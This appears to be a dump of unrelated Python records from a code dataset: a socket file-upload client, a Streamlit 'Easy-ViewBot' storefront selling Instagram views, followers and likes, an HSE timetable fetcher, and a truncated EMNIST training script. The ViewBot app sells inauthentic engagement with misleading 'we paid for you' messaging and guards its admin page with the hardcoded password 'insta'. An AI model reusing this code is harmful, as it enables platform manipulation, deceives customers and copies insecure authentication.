pword into json\r\n info = json.dumps({'type': 'register',\r\n 'username': username,\r\n 'pword': pword})\r\n\r\n self.sock.send(info.encode())\r\n\r\n # wait for response\r\n response = int(self.sock.recv(1024).decode())\r\n return response\r\n\r\n def upload(self, fileName, category, keywords):\r\n \"\"\"\r\n Asks the data_retriever to upload a file to the db\r\n\r\n :param fileName: name of new file (file is stored on user's computer)\r\n :param category: file category\r\n :param: keywords: file keywords\r\n\r\n :return: 0 if upload is not successful\r\n 1 if upload is successful\r\n\r\n \"\"\"\r\n\r\n # initial msg\r\n info = json.dumps({'type': 'upload',\r\n 'user': self.name,\r\n 'name': fileName,\r\n 'category': category,\r\n 'keywords': keywords})\r\n\r\n self.sock.send(info.encode())\r\n\r\n # server tells client to send the file if name is unique\r\n if self.sock.recv(1024).decode() == '1':\r\n # get contents of file\r\n\r\n \r\n file = open(fileName, \"rb\")\r\n\r\n #break file down into 1024 byte chunks\r\n chunk = file.read(1024)\r\n #added the following short loop, if what I read is right this should help send the full file and then end the file with the shutdown method call\r\n while (chunk):\r\n self.sock.send(chunk)\r\n chunk = file.read(1024)\r\n file.close()\r\n \r\n\r\n # TODO: PROTOCOL FOR END OF FILE (currently only sends first 1024 bytes)\r\n # TODO: HAVE TO NOTIFY DATA RETRIEVER WHEN FILE IS DONE\r\n\r\n #send chunks of file\r\n # while (chunk):\r\n # self.sock.send(chunk)\r\n # chunk = file.read(1024)\r\n\r\n # 1 = EOF\r\n # self.sock.send('1'.encode())\r\n\r\n response = int(self.sock.recv(1024).decode())\r\n return response\r\n \r\n\r\n def search(self, fileName):\r\n \"\"\"\r\n Asks the data_retriever to search an existing file in 
the db\r\n\r\n :param fileName: name of file\r\n\r\n :return: contents of file, or an error msg if file doesn't exist\r\n \"\"\"\r\n\r\n def edit(self, fileName, newFile):\r\n \"\"\"\r\n Asks the data_retriever to replace content of a file\r\n\r\n :param fileName: name of existing file\r\n :param newFile: content that will replace fileName's content\r\n\r\n :return: relays the data_retriever's msg\r\n \"\"\"\r\n", "sub_path": "KnowledgeManagement/Client/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 4138, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "socket.socket", "line_number": 16, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 16, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 16, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 31, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 53, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "157181880", "text": "import streamlit as st\nimport sqlite3\nimport pandas as pd\n\ncon=sqlite3.connect(\"bismillah.db\")\nc=con.cursor()\n\n\n\ndef create_usertable():\n\tc.execute(\"CREATE TABLE IF NOT EXISTS user_table3(id integer primary key autoincrement, instalink Text NOT NULL,plan text NOT NULL,ph_no text NOT NULL,status text)\")\n\t\n\ndef add_userdata(instalink,plan,ph_no,stats):\n\tc.execute(\"INSERT INTO user_table3(instalink,plan,ph_no,status) VALUES(?,?,?,?)\",(instalink,plan,ph_no,stats))\n\tcon.commit()\n\ndef view_link_plan():\n\tc.execute(\"Select instalink as Instagram_Link,plan as Selected_Plan from user_table3\")\n\tdata=c.fetchall()\n\treturn data\ndef view_plan_phno():\n\tc.execute(\"Select plan as Selected_Plan,ph_no as Phone_Number from user_table3\")\n\tdata=c.fetchall()\n\treturn data\ndef view_phno_link():\n\tc.execute(\"Select instalink as Instagram_Link,ph_no as Phone_Number from user_table3\")\n\tdata=c.fetchall()\n\treturn data\ndef delete_table():\n\tc.execute(\"DROP TABLE user_table3\")\n\t\ndef view_instalink():\n\tc.execute(\"Select id,instalink,status from user_table3\")\n\tdata=c.fetchall()\n\treturn data\ndef view_plan():\n\tc.execute(\"Select id,plan,status from user_table3\")\n\tdata=c.fetchall()\n\treturn data\ndef change_status(status,row_id):\n\tc.execute(\"update user_table3 set status=? where id =?\",(status,row_id))\n\tcon.commit()\ndef give_id(plan,ph_no):\n\tc.execute(\"SELECT id FROM user_table3 where plan = ? and ph_no = ? ORDER BY id DESC LIMIT 3\",(plan,ph_no))\n\tdata=c.fetchall()\n\treturn data\ndef view_status(row_idd):\n\tc.execute(\"Select status from user_table3 where id=?\",(row_idd,))\n\tdata=c.fetchall()\n\treturn data\n\n\n\n\n#----------------------------------------\n\n\n\ndef insta_link(a,b,c):\n\n\tif c ==1 :\n\t\tst.subheader(\"4. 
Enter your Instagram ID\")\n\t\tlink=\"a\"\n\t\tif st.checkbox(\"How to find my Instagram ID?\"):\n\t\t\tst.info(\"\"\"\n\t\t\tFollow these steps regarding how to select ID\n\t\t\t\n\t To get a link to a post in Android and ios:\n\t 1.Go to Profile.\n\t 2.Select Instagram Id on top of Edit Profie option.\n\t To get a link to a post from the web:\n\t 1.Go to Profile.\n\t 2.Select Instagram Id which is on Left side of Edit Profie option.\n\t\t\t\"\"\")\t\n\t\tlink=st.text_input(\"Copy and paste the ID below\",\"\")\n\t\tst.info(\"Make sure your ID is correct and exact\")\n\t\tst.success(\"We are paying for you, So it is free. Please share it with your friends\")\t\n\t\tst.subheader(\"\")\n\t\tif st.button(\"Click here, We paid for you\"):\n\t\t\tif len(link) > 0 and len(b) ==10:\n\t\t\t\tcreate_usertable()\n\t\t\t\tadd_userdata(link,a,b,\"Processing\")\n\t\t\t\tst.write(\"You have completed it in just 4 Steps\")\n\t\t\t\tpayout=\"\"\"\n\t\t\t\t
\n\t\t\t\t

Payment

\n\t\t\t\t
\n\t\t\t\t\"\"\"\n\t\t\t\tst.markdown(payout,unsafe_allow_html=True)\n\t\t\t\tst.warning(\"Your chosen plan is {}\".format(a))\n\t\t\t\tst.success(\"We are paying for you, So it is free. Please share it with your friends\")\n\t\t\t\tlis=give_id(a,b)\n\t\t\t\ttup=lis[0]\n\t\t\t\tst.write(\"You can track your order status with this id -> \",tup[0])\n\t\t\t\tst.subheader(\"\")\n\t\t\t\tst.warning(\"Your Request will be processed in less than 1 hr after your payment\")\n\t\t\t\t#st.warning(\"\")\n\t\t\telse:\n\t\t\t\tst.warning(\"Fields are missing\")\n\n\n\telif c==0:\n\t\t\n\t\tst.subheader(\"4. Enter your Instagram Post link\")\n\t\tif st.checkbox(\"How to find my Instagram Link?\"):\n\t\t\tst.info(\"\"\"\n\t\t\tFollow these steps regarding how to select link\t\n\t\t\t\n\t To get a link to a post in Android and ios:\n\t 1.Tap ...(Three dots) above the post.\n\t 2.Tap Copy Link.\n\t To get a link to a post from the web:\n\t 1.Open your web browser.\n\t 2.Go to instagram.com/username. For example, if the username is \"johnsmith,\" type in instagram.com/johnsmith as the URL.\n\t 3.Click the post you want to save and copy the link at the top of your browser.\n\t\t\t\"\"\")\n\t\tlink=\"a\"\t\n\t\tlink=st.text_input(\"\")\n\t\tst.info(\"Make sure your link is correct\")\n\t\t#st.subheader(\"\")\n\t\t#st.subheader(\"\")\n\t\t#st.success(\" - 9493736321@okbizaxis \".format(a))\n\t\tst.subheader(\"\")\n\t\tif st.button(\"Click Here to submit\"):\n\t\t\tif len(link) > 0 and len(b) ==10:\n\t\t\t\tcreate_usertable()\n\t\t\t\tadd_userdata(link,a,b,\"Processing\")\n\t\t\t\tst.write(\"You have completed it in just 4 Steps\")\n\t\t\t\tpayout=\"\"\"\n\t\t\t\t
\n\t\t\t\t

Payment

\n\t\t\t\t
\n\t\t\t\t\"\"\"\n\t\t\t\tst.markdown(payout,unsafe_allow_html=True)\n\t\t\t\tst.warning(\"Your chosen plan is {}\".format(a))\n\t\t\t\tst.success(\"\"\"\n\n\t\t\t Send money using Google pay, Phone Pe, Paytm to this Number with Order ID(Mentioned below) as remarks\t\n\t\t\t\n\t 9493736321\n\n\t\t\t \"\"\")\n\t\t\t\tlis=give_id(a,b)\n\t\t\t\ttup=lis[0]\n\t\t\t\tst.write(\"You can track your order status with this id -> \",tup[0])\n\t\t\t\tst.subheader(\"\")\n\t\t\t\tst.warning(\"Your Request will be processed in less than 1 hr after your paymemt\")\n\t\t\t\t#st.warning(\"Your Request will be processed in less than 1 hr\")\n\t\t\telse:\n\t\t\t\tst.warning(\"Fields are missing\")\n\telse:\n\t\t\n\t\tst.subheader(\"4. Enter your Instagram ID\")\n\t\tlink=\"a\"\n\t\tif st.checkbox(\"How to find my Instagram ID?\"):\n\t\t\tst.info(\"\"\"\n\t\t\tFollow these steps regarding how to select ID\n\t\t\t\n\t To get Instagram ID in Android and ios:\n\t 1.Go to Profile.\n\t 2.Select Instagram Id on top of Edit Profie option.\n\t To get Instagram ID from the web:\n\t 1.Go to Profile.\n\t 2.Select Instagram Id which is on Left side of Edit Profie option.\n\t\t\t\"\"\")\t\n\t\tlink=st.text_input(\"Copy and paste the ID below\",\"\")\n\t\tst.info(\"Make sure your ID is correct and exact\")\n\t\t#st.subheader(\"\")\n\t\tst.subheader(\"\")\n\t\tif st.button(\"Click here and send the money\"):\n\t\t\tif len(link) > 0 and len(b) ==10:\n\t\t\t\tcreate_usertable()\n\t\t\t\tadd_userdata(link,a,b,\"Processing\")\n\t\t\t\tst.write(\"You have completed it in just 4 Steps\")\n\t\t\t\tpayout=\"\"\"\n\t\t\t\t
\n\t\t\t\t

Payment

\n\t\t\t\t
\n\t\t\t\t\"\"\"\n\t\t\t\tst.markdown(payout,unsafe_allow_html=True)\n\t\t\t\tst.warning(\"Your chosen plan is {}\".format(a))\n\t\t\t\tst.success(\"\"\"\n\n\t\t\t Send money using Google pay, Phone Pe, Paytm to this Number with Order ID(Mentioned below) as remarks/message\t\n\t\t\t\n\t 9493736321\n\n\t\t\t \"\"\")\n\t\t\t\tlis=give_id(a,b)\n\t\t\t\ttup=lis[0]\n\t\t\t\tst.write(\"You can track your order status with this id -> \",tup[0])\n\t\t\t\tst.subheader(\"\")\n\t\t\t\tst.warning(\"Your Request will be processed in less than 1 hr after your payment\")\n\t\t\t\t#st.warning(\"Your Request will be processed in less than 1 hr\")\n\t\t\telse:\n\t\t\t\tst.warning(\"Fields are missing\")\t\t\t\n\ndef admin():\n\tst.write(\"You are in admin page now\")\n\tst.warning(\"This page is for Admin\")\n\tst.info(\"If you are user, please select Normal user option to use this website\")\n\ta=st.text_input(\"Username\",\"admin\")\n\tb=st.text_input(\"Password\",\"\",type=\"password\")\n\tif a == \"admin\" and (b==\"insta\" or b == \"Insta\"):\n\t\tst.success(\"You logged in as admin\")\n\t\tst.subheader(\"What do you want to view\")\n\t\ts=st.selectbox(\"\",[\"Plan and Phone number\",\"Instagram Link and Plan\",\"Instagram Link and Phone Number\",\"Instagram Link\",\"Plan\"])\n\t\tif s == \"Plan and Phone number\":\n\t\t\tdata=view_plan_phno()\n\t\t\tdf=pd.DataFrame(data)\n\t\t\tdf_new = df.rename(columns={'0': 'Selected_Plan','1':'Phone_Number'})\n\t\t\tst.dataframe(df_new)\n\n\t\telif s == \"Instagram Link and Plan\":\n\t\t\tdata=view_link_plan()\n\t\t\tst.dataframe(data)\n\t\telif s== \"Instagram Link and Phone Number\":\n\t\t\tdata=view_phno_link()\n\t\t\tst.dataframe(data)\n\t\telif s== \"Instagram Link\":\n\t\t\tdata=view_instalink()\n\t\t\tst.dataframe(data)\n\t\telif s== \"Plan\":\n\t\t\tdata=view_plan()\n\t\t\tst.dataframe(data)\n\t\tif st.button(\"Delete All Rows\"):\n\t\t\tdelete_table()\t\n\t\tst.subheader(\"Dear, Admin Update enter user id and click success after transaction\")\n\t\trow_id=st.text_input(\"Enter the ID you have completed(Exactly)\")\n\t\tif st.button(\"Success\"):\n\t\t\tchange_status(\"Success\",row_id)\n\n\t\t\t\n\t\tst.subheader(\"Dear, Admin These are the Links to the Plans\")\t\n\t\tplann=st.selectbox(\"\",(\"Views\",\"No_Refill-Followers\",\"Refill-Followers\",\"Likes\",\"Free_Followers\"))\n\t\tif plann == \"Views\":\n\t\t\tst.write(\"https://socialdaddy.in/default.aspx?cat=55\")\n\t\t\tst.write(\"Select this -> 1.Insagram Views 2.Instagram Likes [15k] [Working After Update]- 57 INR\")\n\t\telif plann == \"No_Refill-Followers\":\n\t\t\tst.write(\"https://socialdaddy.in/default.aspx?cat=55\")\n\t\t\tst.write(\"Select this -> 1.Instagram Followers(No-Refill) 2.Instagram Followers Real Mixed [15k]- 130 INR\")\n\t\t\t\n\t\telif plann == \"Refill-Followers\":\n\t\t\tst.write(\"https://socialdaddy.in/default.aspx?cat=55\")\n\t\t\tst.write(\"Select this -> 1.Instagram Followers(Refill) 2.Instagram Followers [Refill 45 Days] [New]- 156 INR\")\n\t\t\t\n\t\telif plann == \"Likes\":\n\t\t\tst.write(\"https://socialdaddy.in/default.aspx?cat=55\")\n\t\t\tst.write(\"Select this -> 1.Instagram Likes 2.Instagram Likes [15k] [Working After Update]- 57 INR\")\n\t\t\t\n\t\telif plann == \"Free_Followers\":\n\t\t\tst.write(\"https://famoid.com/get-free-instagram-followers/\")\n\t\t\tst.write(\"https://temp-mail.org/en/\")\n\t\t\t\n\t\t\t\t\n\ndef normal_user():\n\thead=\"\"\"\n\t\t
\n\t\t

Easy-ViewBot

\t\t\n\t\t
\n\t\t\"\"\"\n\tst.markdown(head,unsafe_allow_html=True)\n\n\ttitle=\"\"\"\n\t\t
\n\t\t

Do you need Views, followers, likes on instagram ?

\n\t\t

We are here to help you

\n\t\t

Increase your social influence in just 4 Steps

\n\t\t
\n\t\t\"\"\"\n\tst.markdown(title,unsafe_allow_html=True)\t\n\tst.subheader(\"\")\n\tst.subheader(\"1. What do you want to increase\")\n\tst.info(\"** Please make your account PUBLIC for sometime if it is PRIVATE\")\n\tvar_a=st.radio(\"\",[\"Views\",\"Followers\",\"Likes\",\"Free Followers\"])\n\tv_dic={1:\"100 Views - 4 INR\",2:\"1000 Views - 5 INR\",3:\"10000 Views - 15 INR\",4:\"100000 Views - 150 INR\"}\n\tif var_a == \"Views\":\n\t\tst.info(\"** Views are only for videos, If no videos exist in your account select other options(Likes, Followers)\")\n\n\t\tst.subheader(\"2. Select the plan\")\n\t\t\n\t\tv_plan=st.radio(\"\",[\"100 Views - 4 INR\",\"1000 Views - 9 INR\",\"10000 Views - 29 INR [Recommended]\",\"100000 Views - 49 INR\"])\n\t\t#st.warning(\"{} is selected\".format(v_plan))\n\t\tst.subheader(\"3. Enter your Phone number and relax, we will contact you shortly\")\n\t\tph_no=st.text_input(\"+91-\")\n\t\tif len(ph_no) == 10:\n\t\t\tst.write(\"\")\n\t\telse:\n\t\t\tst.warning(\"Enter correct phone number\")\n\n\t\tbuff=insta_link(v_plan,ph_no,0)\n\t\t\t\t\t \n\telif var_a == \"Followers\":\n\t\tv_plan=\"\"\n\t\tst.subheader(\"2. Select the plan\")\n\t\tp=st.radio(\"\",[\"No Refill - Followers will not be added if decreased\",\"Refill - Followers will be added again if decreased in next 45 days\"])\n\t\tif p == \"No Refill - Followers will not be added if decreased\":\n\t\t\tv_plan=st.radio(\"\",[\"50 Followers - 9 INR\",\"100 Followers - 16 INR\",\"200 Followers - 32 INR\",\"400 Followers - 49 INR\",\"500 Followers - 63 INR \",\"1,000 Followers - 103 INR [Recommended]\"])\n\t\telif p == \"Refill - Followers will be added again if decreased in next 45 days\":\n\t\t\tv_plan=st.radio(\"\",[\"50 Followers - 13 INR\",\"100 Followers - 24 INR\",\"200 Followers - 44 INR\",\"300 Followers - 66 INR\",\"500 Followers - 99 INR [Recommended]\",\"1000 Followers - 180 INR\"])\n\t\tst.warning(\"{} is selected\".format(v_plan))\n\t\tst.subheader(\"3. Enter your Phone number and relax, we will contact you shortly\")\n\t\tph_no=st.text_input(\"+91-\")\n\t\tif len(ph_no) == 10:\n\t\t\tst.write(\"\")\n\t\telse:\n\t\t\tst.warning(\"Enter correct phone number\")\n\n\t\tbuff=insta_link(v_plan,ph_no,9)\t\t\t \n\t\t#st.warning(\"{} is selected\".format(v_plan))\n\telif var_a == \"Likes\":\n\t\tst.subheader(\"2. Select the plan\")\n\t\t\n\t\tv_plan=st.radio(\"\",[\"100 Likes - 10 INR\",\"200 Likes - 18 INR\",\"300 Likes - 29 INR\",\"400 Likes - 39 INR\",\"500 Likes - 49 INR [Recommended]\",\"1000 Likes - 98 INR\"])\n\t\tst.warning(\"{} is selected\".format(v_plan))\n\t\tst.subheader(\"3. Enter your Phone number and relax, we will contact you shortly\")\n\t\tph_no=st.text_input(\"+91-\")\n\t\tif len(ph_no) == 10:\n\t\t\tst.write(\"\")\n\t\telse:\n\t\t\tst.warning(\"Enter correct phone number\")\n\n\t\tbuff=insta_link(v_plan,ph_no,0)\n\t\t\t\t\t\n\t\t\t\t\t\n\telse:\n\t\tst.subheader(\"2. You will get free Followers.\")\n\t\tst.info(\"We are paying for you. So, that you trust, use and share our website\")\n\t\t\n\t\tv_plan=\"25 Free Followers\"\n\t\tst.warning(\"{} is selected\".format(v_plan))\n\t\tst.subheader(\"3. Enter your Phone number and relax, we will contact you shortly\")\n\t\tph_no=st.text_input(\"+91-\")\n\t\tif len(ph_no) == 10:\n\t\t\tst.write(\"\")\n\t\telse:\n\t\t\tst.warning(\"Enter correct phone number\")\n\n\t\tbuff=insta_link(v_plan,ph_no,1)\n\tst.subheader(\" \")\t\t\t\t\n\t#st.subheader(\"Track your order\")\n\t#st.write(\"\")\n\n\ttrack=\"\"\"\n\t\t
\n\t\t

Track your Order

\n\t\t
\n\t\t\"\"\"\n\tst.markdown(track,unsafe_allow_html=True)\n\n\trow_idd=st.text_input(\"Enter your Tracking ID\")\n\t#st.write(\"This is track id given by user \",row_idd)\n\t\n\tif st.button(\"Track my order\"):\n\t\ttry:\n\t\t\tv_s=view_status(row_idd)\n\t\t\tb=v_s[0]\n\t\t\tif b[0] == \"Success\":\n\t\t\t\tst.success(\"Your order is Successful\")\n\t\t\telse:\n\t\t\t\tst.info(\"Don't Worry, your order is under process. We will let you know when it is finished\")\n\t\texcept:\n\t\t\tst.warning(\"Please enter correct order ID\")\t\n\n\n\t\t\t\n\n\n\n\n\tst.subheader(\" \")\n\tst.subheader(\" \")\n\tst.subheader(\" \")\n\tst.write(\"Contact us - easy-viewbot@protonmail.com\")\n\t\t#st.warning(\"{} is selected\".format(v_plan))\t\n\ndef main():\n\t\n\tadmin_status=st.radio(\"\",[\"Normal User\",\"Admin\"])\n\t#st.write(admin_status)\n\tif admin_status == \"Normal User\":\n\t\t#m,j,k=normal_user()\n\t\tnormal_user()\n\t\t#if len(m)>6:\n\t\t\t#st.write(\"{}, {}, {}\".format(m,j,k))\n\t\t\t\n\t\t\t#st.subheader(\"\")\n\telse:\n\t\tcreate_usertable()\n\t\tadmin()\n\nif __name__ == '__main__':\n main()\n", "sub_path": "viewbot.py", "file_name": "viewbot.py", "file_ext": "py", "file_size_in_byte": 13963, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sqlite3.connect", "line_number": 5, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 63, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 65, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 66, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 76, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 77, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 78, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 79, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 80, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 84, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 90, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 91, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 92, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 95, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 96, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 97, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 100, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 105, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 106, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 107, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 119, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 120, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 124, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 125, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 129, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 135, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 136, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 137, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 146, "usage_type": "call"}, {"api_name": 
"streamlit.subheader", "line_number": 147, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 148, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 151, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 154, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 156, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 157, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 167, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 168, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 170, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 171, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 175, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 181, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 182, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 183, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 192, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 193, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 194, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 197, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 200, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 201, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 202, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 203, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 204, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 206, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 207, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 208, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 211, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 213, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 217, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 220, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 223, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 226, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 227, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 229, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 230, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 231, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 235, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 236, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 238, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 239, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 241, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 242, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 245, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 246, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 249, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 250, "usage_type": "call"}, {"api_name": 
"streamlit.write", "line_number": 253, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 254, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 264, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 273, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 274, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 275, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 276, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 277, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 280, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 282, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 284, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 286, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 287, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 289, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 291, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 297, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 298, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 300, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 302, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 303, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 304, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 305, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 307, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 309, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 314, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 316, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 317, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 318, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 319, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 321, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 323, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 329, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 330, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 333, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 334, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 335, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 337, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 339, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 342, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 351, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 353, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 356, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 361, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 363, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 365, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 373, "usage_type": "call"}, {"api_name": 
"streamlit.subheader", "line_number": 374, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 375, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 376, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 381, "usage_type": "call"}]} +{"seq_id": "137527318", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport click\nimport requests\n\n@click.command()\n@click.argument('surname')\n@click.argument('name')\n@click.argument('patronymic')\ndef get_shedule(surname,name,patronymic):\n person = 'https://ruz.hse.ru/api/search?term='+surname+' '+name+' '+patronymic+'&type=person'\n r1 = requests.get(person)\n\n prepod_id = r1.json()[0]['id']\n shedule = 'https://ruz.hse.ru/api/schedule/person/' + prepod_id + '?start=2020.09.20&finish=2020.09.30&lng = 1'\n r2 = requests.get(shedule)\n s = r2.json()\n for i in range(len(s)):\n print(str(i + 1) + ') ' + s[i]['date'] + ' ' + s[i]['dayOfWeekString'] + ' ' + s[i]['discipline'])\n print(s[i]['beginLesson'] + ' - ' + s[i]['endLesson'])\n print(s[i]['building'] + ' ' + s[i]['auditorium'])\n print(s[i]['group'])\n print('\\n')\n\nif __name__ == '__main__':\n get_shedule()\n", "sub_path": "doobalueva.py", "file_name": "doobalueva.py", "file_ext": "py", "file_size_in_byte": 898, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}, {"api_name": "click.command", "line_number": 7, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 8, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 9, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "257590013", "text": "'''Trains a simple deep NN on the MNIST dataset.\nGets to 98.40% test accuracy after 20 epochs\n(there is *a lot* of margin for parameter tuning).\n2 seconds per epoch on a K520 GPU.\n'''\n\nfrom __future__ import print_function\n\nimport tensorflow as tf\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras.optimizers import RMSprop\n\n'''Importing the EMNIST letters'''\nfrom scipy import io as sio\n\nbatch_size = 128\nnum_classes = 26\nepochs = 20\n\n# the data, split between train and test sets\n# (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# x_train = x_train.reshape(60000, 784)\n# x_test = x_test.reshape(10000, 784)\n# x_train = x_train.astype('float32')\n# x_test = x_test.astype('float32')\n# x_train /= 